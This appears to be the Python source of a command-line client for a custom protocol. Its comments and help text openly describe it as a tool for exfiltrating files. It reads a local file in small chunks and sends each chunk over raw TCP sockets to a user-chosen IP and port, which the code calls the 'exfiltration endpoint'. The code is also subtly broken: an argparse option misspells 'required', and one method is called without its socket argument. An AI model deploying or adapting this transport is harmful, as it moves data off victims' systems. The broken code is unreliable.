import sys
import argparse

from dep_common.converter.Converter import Converter as DEPConverter
from dep_common.msg.MessageType import MessageType as DEPMessageType

from dep_client.args.Args import Args
from dep_client.util.Util import Util
from dep_client.client.Client import Client
from dep_client.output.Output import Output

def main(args_=None):
    """The main routine."""
    if args_ is None:
        args_ = sys.argv[1:]

    parser = argparse.ArgumentParser()
    Args.addArguments(parser)
    args = parser.parse_args()

    # Creates Output instance for printing header and footer of console output
    out = Output()
    out.printHeader()

    # Create client
    c = Client(args.ip, args.port, args.pkgSize)

    # Get message type
    msgType = DEPMessageType.VALUES[args.msg]
    # Handle msg type
    b_systemId = DEPConverter.uuidStrToBytes(args.uuid)
    if(msgType == DEPMessageType.SYSTEM_INFORMATION_MESSAGE):
        c.sendSystemInformationMessage(b_systemId)
    elif(msgType == DEPMessageType.DATA_INFORMATION_MESSAGE):
        b_sha256Hash = DEPConverter.sha256HashStrToBytes(args.hash)
        c.sendDataInformationMessage(b_systemId, b_sha256Hash, args.path, args.size)
    elif(msgType == DEPMessageType.DATA_ACKNOWLEDGE_MESSAGE):
        b_sha256Hash = DEPConverter.sha256HashStrToBytes(args.hash)
        c.sendDataAcknowledgeMessage(b_systemId, b_sha256Hash, args.dataState)
    elif(msgType == DEPMessageType.DATA_CONTENT_MESSAGE):
        b_sha256Hash = DEPConverter.sha256HashStrToBytes(args.hash)
        Util.sendFileWithDataContentMessage(c, args.ip, args.port, args.pkgSize, args.path, b_systemId, b_sha256Hash)
        
    else:
        print("Wrong Message Type provided!")

    out.printExecutionTime()


if __name__ == "__main__":
    sys.exit(main())



import socket

from dep_common.msg.MessageFactory import MessageFactory

class Client():
    def __init__(self, ip, port, pkgSize = 1321) -> None:
        self.ip = ip
        self.port = port
        self.pkgSize = pkgSize
        self.msgFactory = MessageFactory()

    # uuid - bytes - a uuid in bytes representation
    def sendSystemInformationMessage(self, uuid):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.ip, self.port))
        # Create Message
        msg = self.msgFactory.createSystemInformationMessage(uuid, self.pkgSize)
        # Send Message and close connection
        s.sendall(msg)
        s.close()

    #        uuid - bytes - a uuid in bytes representation
    # sha256_hash - bytes - SHA256 hash in bytes of the data to be transfered
    #        path -   str - (for files)     path under which the data is located 
    #                       (for in memory) path under which the data is saved at exfiltration endpoint
    #        size -   int - size of data in bytes
    def sendDataInformationMessage(self, uuid, sha256_hash, path, size):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.ip, self.port))
        # Create Message
        msg = self.msgFactory.createDataInformationMessage(uuid, sha256_hash, path, size)
        # Send Message and close connection
        s.sendall(msg)
        s.close()

    #           s - socket - Socket to transfer data
    #        uuid -  bytes - A uuid in bytes representation
    # sha256_hash -  bytes - SHA256 hash in bytes of the data this message corresponds to
    #   dataState -    int - 0 = Data is not exfiltrated yet
    #                        1 = Data is already exfiltrated 
    #                        2 = Data available under given path but hash differs
    def sendDataAcknowledgeMessage(self, s, uuid, sha256_hash, dataState):
        # Create Message
        msg = self.msgFactory.createDataAcknowledgeMessage(uuid, sha256_hash, dataState)
        # Send Message
        s.sendall(msg)

    #           s - socket - Socket to transfer data
    #        uuid -  bytes - A uuid in bytes representation
    # sha256_hash -  bytes - SHA256 hash of the data to be transfered
    #       pkgNr -    int - Number of the package
    #        data -  bytes - Actual data content 
    def sendDataContentMessage(self, s, uuid, sha256_hash, pkgNr, data):
        # Create Message
        msg = self.msgFactory.createDataContentMessage(uuid, sha256_hash, pkgNr, data)
        # Send Message and close Connection
        s.sendall(msg)


import sys
import socket

class Util():
    def sendFileWithDataContentMessage(client, ip, port, pkgSize, path, b_systemId, b_sha256Hash):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        with open(path, "rb") as f:
                counter = 1
                while True:
                    data = f.read(pkgSize)
                    if not data:
                        break
                    client.sendDataContentMessage(s, b_systemId, b_sha256Hash, counter, data)
                    counter = counter + 1
        s.close()

    def sendDataWithDataContentMessage(client, ip, port, pkgSize, data, counter, b_systemId, b_sha256Hash):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        client.sendDataContentMessage(s, b_systemId, b_sha256Hash, counter, data)
        s.close()


import argparse

class Args():
    # parser: argparse instance
    def addArguments(parser):
        parser.add_argument("--ip", "-i", type=str, required=True, help="IP address of destination")
        parser.add_argument("--port", "-r", type=int, required=True, help="Port of destination")
        parser.add_argument("--pkgSize", "-k", type=int, default=1321, help="The size of the package which shall be used for exfiltration. Needs to be <= 1321 Bytes")
        parser.add_argument("--msg", "-m", type=str, requred=True, choices=["sim","dim", "dam", "dcm"], help="The message you want to send. Consult README for more information on the message type to choose.")
        parser.add_argument("--uuid", "-u", type=str, required=True, help="uuid4 str, e.g.: 50f437d8-28b7-4c65-9588-eef116a60ae3")
        parser.add_argument("--hash", "-a", type=str, help="sha256 hash of data as hex string")
        parser.add_argument("--path", "-p", type=str, help="(for files) path under which the data is located. (for in memory) path under which the data is saved at exfiltration endpoint")
        parser.add_argument("--size", "-s", type=int, help="size of data in bytes")
        parser.add_argument("--dataState", "-d", type=int, choices=[0,1,2], help="0 = Data is not exfiltrated yet, 1 = Data is already exfiltrated, 2 = Data available under given path but hash differs")